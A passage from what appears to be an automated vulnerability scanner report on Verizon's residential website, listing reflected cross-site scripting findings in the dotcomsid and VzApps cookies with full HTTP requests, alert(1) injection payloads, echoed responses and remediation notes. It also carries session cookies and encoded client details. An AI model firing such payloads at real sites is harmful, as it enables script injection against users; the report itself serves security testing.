Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXc19d5'><script>alert(1)</script>36277642c37; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 150436
Expires: Sat, 20 Nov 2010 03:00:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:00:51 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC19D5'><SCRIPT>ALERT(1)</SCRIPT>36277642C37 ' />
...[SNIP]...

3.274. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [dotcomsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29ff7"-alert(1)-"213bd3ed367 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=29ff7"-alert(1)-"213bd3ed367; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 161440
Expires: Sat, 20 Nov 2010 03:00:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:00:39 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "29ff7"-alert(1)-"213bd3ed367"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.275. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 86006<script>alert(1)</script>84bd500f181 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX86006<script>alert(1)</script>84bd500f181; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 109086
Expires: Sat, 20 Nov 2010 02:55:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX86006<script>alert(1)</script>84bd500f181; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX86006<SCRIPT>ALERT(1)</SCRIPT>84BD500F181 </DIV>
...[SNIP]...

3.276. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f06b1'><script>alert(1)</script>fc2813f1a29 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf06b1'><script>alert(1)</script>fc2813f1a29; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110632
Expires: Sat, 20 Nov 2010 02:55:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:34 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=TXf06b1'><script>alert(1)</script>fc2813f1a29; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF06B1'><SCRIPT>ALERT(1)</SCRIPT>FC2813F1A29 ' />
...[SNIP]...

3.277. https://www22.verizon.com/Residential/FiOSTV/ [dotcomsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b10ba"-alert(1)-"93515101fac was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=b10ba"-alert(1)-"93515101fac; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; 